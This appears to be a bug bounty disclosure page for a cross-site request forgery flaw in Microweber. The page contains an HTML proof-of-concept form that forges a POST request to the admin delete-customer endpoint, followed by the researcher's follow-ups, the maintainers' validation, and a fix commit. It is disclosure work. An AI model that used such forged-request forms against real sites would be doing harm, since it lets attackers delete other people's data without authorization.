Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Jul 30th 2021

✍️ Description

Attacker able to delete any customer if knows the customer ids[] parameter value.

🕵️‍♂️ Proof of Concept

Here after running PoC.html on Firefox or Safari and click on submit button (also can be auto-submit) you will see that the customer with id 2 has been deleted.

//PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.microweber.org/demo/admin/customers/delete" method="POST">
<input type="hidden" name="id&#91;&#93;" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

💥 Impact

Here a customer with id value 2 will be deleted after clicking on submit button. 📍 Location app.js#L1

Occurrences

We have contacted a member of the microweber team and are waiting to hear back 2 years ago
amammad
2 years ago

Researcher

Hey microweber team , can you give some feedbacks to me? thanks so much.

amammad modified the report
2 years ago
amammad
2 years ago

Researcher

Hey microweber team, I just want to sure that you see this important report too.

amammad
2 years ago

Researcher

Dear microweber team, Can I ask you to validate this report too, I think that you forget to check this report.

Best regards, Amammad.

Peter Ivanov validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed with commit a42ffd 2 years ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation